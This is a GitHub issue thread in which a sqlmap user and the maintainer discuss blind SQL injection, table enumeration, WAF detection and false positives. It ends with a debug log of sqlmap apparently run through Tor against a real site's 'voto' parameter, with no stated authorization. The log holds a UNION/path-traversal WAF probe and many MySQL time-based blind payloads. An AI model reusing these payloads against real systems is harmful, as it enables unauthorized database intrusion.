Should I always need system access read permissions?

Usually, when sqlmap finds injections from type *-blind based or even error or union based, it usually can't dump any data. Sometimes offers me to check for common databases and tables in a wordlist and sometimes it tries guessing letter by letter, but I'm not sure when that is possible. Anyway, even if it starts guessing I wouldn't be able to dump any table. Only if the injection is stacked or inline based, then I would be able to list and maybe update them.

I know this is too general, what's left in those cases?

1. Should I always need system access read permissions? What conditions should happen to retrieve and dump tables?
2. You can't tell me how but, should be always possible to exploit an injection having at least one?
3. If I'm behind a WAF, would sqlmap always tell me? or sometimes it is implicit?

[stamparm]

You are the first one that says that sqlmap usually can't dump any data. Can you please then switch to some other tool?

1. There should be an information_schema-like system table at the other side where sqlmap can retrieve database and table names. Also, the user account used by the vulnerable web application should have the read rights to system tables (any hardened DBMS will restrain access to system tables)
2. I am not sure where did you get always here. If there is any kind of filtering or protection at the other side than you shouldn't be able to exploit it (even if there is a single SQLi injection point)
3. sqlmap will tell you if it is able to recognize such behavior (usually it will be able to recognize anything suspicious). There are lots of situations where only the pentester can know if there is a WAF or not.

Miroslav, the problem is (if not always) ME. When I say "usually can't dump any data" I mean dump table data, and that because I should have not system read permissions with that user in that web application. I've already read the wiki, but I wonder where can I read experiences with sqlmap in order to use it better.

[stamparm]

Why don't you try http://testphp.vulnweb.com/artists.php?artist=1? Its public and legal (vulnerable) page where you try infosec tools (including sqlmap).

Thanks, I should try with that first.

One last question here. Why sometimes everything lends sqlmap to guess letter by letter, and sometimes offers to search on wordlists? When that happens each?

[stamparm]

Can you please be more specific?
On May 6, 2015 5:03 PM, "julegatti" notifications@github.com wrote:

One last question here. Why sometimes everything lends sqlmap to guess
letter by letter and sometimes if offers to search on wordlists?

—
Reply to this email directly or view it on GitHub
#1242 (comment)
.

I mean, sometimes sqlmap tries to guess the databases or tables names by retrieving letter by letter in a slow and difficult process, and sometimes it offers to search for common names in a wordlist

[stamparm]

That letter by letter process is blind injection. That should be the first
thing to learn in SQL injection. That is being done when the other ends
data can be extracted char by char.

When the other side's table names can't be extracted char by char (e.g.
because of restrictions on system tables containing identifier names) those
names must be guessed (by using wordlists containing common names).

Char by char (painful process) is far better because you know that at the
end you'll get names for sure. In guessing (wordlist approach) you can
easily be left without any results (because of usage of custom names).
On May 6, 2015 6:54 PM, "julegatti" notifications@github.com wrote:

I mean, sometimes sqlmap tries to guess the databases or tables names by
retrieving letter by letter in a slow and difficult process, and sometimes
it offers to search for common names in a wordlist

—
Reply to this email directly or view it on GitHub
#1242 (comment)
.

got that!
Now I'll keep reading before asking any new question. I don't want to be a lammer haha Thanks for replying

Well.. last one for now. If I found only one injection point (AND/OR time-based blind), and I can't retrieve databases, neither --banner, and already passed --identify-waf without any errors so there isn't waf involved, could I be sure that it is a false positive? I read something like this on another issue

[stamparm]

--identify-waf tries to identify WAF if there is any. It is not proof of non-existence.

AND/OR time-based blind is the most affected SQLi technique to false positives. sqlmap has couple of "defenses" against such cases, but there is always a chance to get one.

In those kind of cases I strongly suggest you to rerun with --flush-session. If the next time that same SQLi is not detected than it is highly probably that you stumbled upon the false positive.

I did it twice. The second time (with --flush-session) appending --level 5. Both gave me the same injection point. The second one took more time and requests obviously.

I suspect there is no WAF because there were only 2 http errors, and debug tells that if I encounter several errors it is probably behind one. But I can't be sure anyway. Already tried --no-cast.

This is my last log trying to get the banner, just in case,

 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150504}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:52:22

[17:52:22] [DEBUG] cleaning up configuration parameters
[17:52:22] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[17:52:22] [INFO] setting Tor SOCKS proxy settings
[17:52:22] [DEBUG] setting the HTTP timeout
[17:52:22] [DEBUG] creating HTTP requests opener object
[17:52:22] [INFO] checking Tor connection
[17:52:23] [DEBUG] SSL connection error occurred ('[Errno 1] _ssl.c:510: error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure')
[17:52:26] [DEBUG] declared web page charset 'utf-8'
[17:52:26] [INFO] Tor is properly being used
[17:52:26] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:52:27] [INFO] resuming back-end DBMS 'mysql' 
[17:52:27] [INFO] testing connection to the target URL
[17:52:28] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[17:52:28] [PAYLOAD] BnwD=3919 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: voto (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: submit=&voto=8' AND (SELECT * FROM (SELECT(SLEEP(10)))XXJP) AND 'axZE'='axZE&pelicula_id=2313
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[17:52:30] [INFO] the back-end DBMS is MySQL
[17:52:30] [INFO] fetching banner
[17:52:30] [PAYLOAD] 8
[17:52:32] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>64,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:52:32] [WARNING] it's highly recommended to avoid usage of switch '--tor' for time-based injections because of its high latency time                                
[17:52:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................
[17:53:25] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>32,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[17:53:27] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>16,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:29] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>8,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:30] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>4,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:32] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>2,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:34] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>1,0,10)))))JqjI) AND 'gXJt'='gXJt
[17:53:35] [INFO] retrieved: 
[17:53:35] [DEBUG] performed 7 queries in 63.74 seconds
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[17:53:36] [INFO] fetching banner
[17:53:36] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>64,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:37] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>32,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:39] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>16,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:40] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>8,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:42] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>4,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:44] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>2,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:45] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))>1,0,10)))))wJzA) AND 'lRHt'='lRHt
[17:53:47] [INFO] retrieved: 
[17:53:47] [DEBUG] performed 7 queries in 11.53 seconds
[17:53:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None
[17:53:47] [INFO] fetching database names
[17:53:47] [INFO] fetching number of databases
[17:53:47] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51,0,10)))))ShAa) AND 'fqie'='fqie
[17:53:49] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48,0,10)))))ShAa) AND 'fqie'='fqie
[17:53:51] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>1,0,10)))))ShAa) AND 'fqie'='fqie
[17:53:52] [INFO] retrieved: 
[17:53:52] [DEBUG] performed 3 queries in 4.84 seconds
[17:53:52] [ERROR] unable to retrieve the number of databases
[17:53:52] [INFO] falling back to current database
[17:53:52] [INFO] fetching current database
[17:53:52] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:53:54] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>32,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:53:55] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>16,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:53:57] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>8,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:53:59] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>4,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:54:01] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>2,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:54:02] [PAYLOAD] 8' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>1,0,10)))))WRtt) AND 'NuUY'='NuUY
[17:54:04] [INFO] retrieved: 
[17:54:04] [DEBUG] performed 7 queries in 12.17 seconds
[17:54:04] [CRITICAL] unable to retrieve the database names

[*] shutting down at 17:54:04